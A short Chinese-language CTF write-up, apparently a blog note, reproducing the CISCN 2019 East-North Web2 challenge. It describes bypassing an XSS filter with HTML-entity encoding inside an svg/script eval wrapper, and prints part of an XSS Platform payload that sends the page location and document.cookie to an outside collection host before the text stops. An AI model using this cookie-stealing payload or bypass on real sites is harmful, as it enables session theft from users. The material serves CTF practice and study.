复现题目[CISCN 2019 华东北赛区 Web2 WriteUp](https://www.zhaoj.in/read-6100.html)的一些东西
以前一直没做过xss的题,这次按writeup做题感觉有所收获,记录一下吧 xss 的waf的绕过 ()都被过滤,把所有的payload转为 HTML Markup ,其实就是&#加ascii码 payload <svg><script>eval("" + output + "")</script> output就是下面的东西转化为HTML Markup编码的东西,这是XSS Platform这个平台自带的payload,一开始没看懂,整理一下代码格式 (function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0 &location='+escape((function(){try{return document.location.href}catch(e){return''}})())+ '&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+ '&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+ '